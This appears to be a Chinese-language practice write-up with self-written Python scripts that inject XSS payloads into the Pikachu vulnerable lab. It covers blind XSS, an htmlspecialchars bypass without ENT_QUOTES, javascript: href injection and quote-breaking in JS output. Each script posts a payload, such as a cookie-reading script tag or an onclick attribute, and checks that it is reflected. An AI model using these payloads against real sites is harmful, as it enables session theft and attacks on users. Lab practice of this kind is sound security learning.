pikachu自编exp,xss之盲打，过滤，htmlspecialchars，href，js

xss之盲打

#盲打的意思就是，你注入的内容，不会在前台出现，只有放管理员在后台触发时候，才会执行回显

过滤

htmlspecialchars

#htmlspecialchars () 没有加 ENT_QUOTES，单引号 ' 不被转义，导致可以闭合属性、插入恶意事件。

href

#href 输出：没过滤协议 → javascript: 执行代码

js

#JS 输出：没转义引号 → 闭合字符串执行代码

1.

#盲打的意思就是，你注入的内容，不会在前台出现，只有放管理员在后台触发时候，才会执行回显 import requests url = "http://192.168.8.1/pikachu-master/vul/xss/xssblind/xss_blind.php" payload = "<script>alert(document.cookie)</script>" resp = requests.post(url, data={"content":payload,"name":"name"}) print("[+] 注入完成! ") print("[+] 检测是否注入成功: ",payload in resp.text)

2.

import requests url = "http://192.168.8.1/pikachu-master/vul/xss/xss_01.php" payload = "<Script>alert(1)</Script>" resp = requests.get(url,params={"message":payload,"submit":"submit"}) print("[+] 完成注入") print("[+] 查看是否注入成功: ",'<Script>' in resp.text)

3.

#htmlspecialchars () 没有加 ENT_QUOTES，单引号 ' 不被转义，导致可以闭合属性、插入恶意事件。 import requests url = "http://192.168.8.1/pikachu-master/vul/xss/xss_02.php" payload = "' onclick='alert(1)'" resp = requests.get(url,params={"message":payload,"submit":"submit"}) print("[+] 注入完成") print("[+] 查看是否注入成功: ",payload in resp.text) print("点击一下页面，弹出弹框")

4.

#href 输出：没过滤协议 → javascript: 执行代码 import requests url = "http://192.168.8.1/pikachu-master/vul/xss/xss_03.php" payload = "javascript:alert(1);" resp = requests.get(url, params={"message":payload,"submit":"submit"}) print("[+] 注入完成") print("[+] 查看注入是否成功:",payload in resp.text ) print("[+] 点击页面的链接") print(f"[+] 或者点击:{url}?message={payload}")

5.

#JS 输出：没转义引号 → 闭合字符串执行代码 import requests url = "http://192.168.8.1/pikachu-master/vul/xss/xss_04.php" payload = "';alert(1);//" resp = requests.get(url,params={"message":payload,"submit":"submit"}) print("[+] 注入完成") print("[+] 查看是否注入成功: ","alert" in resp.text)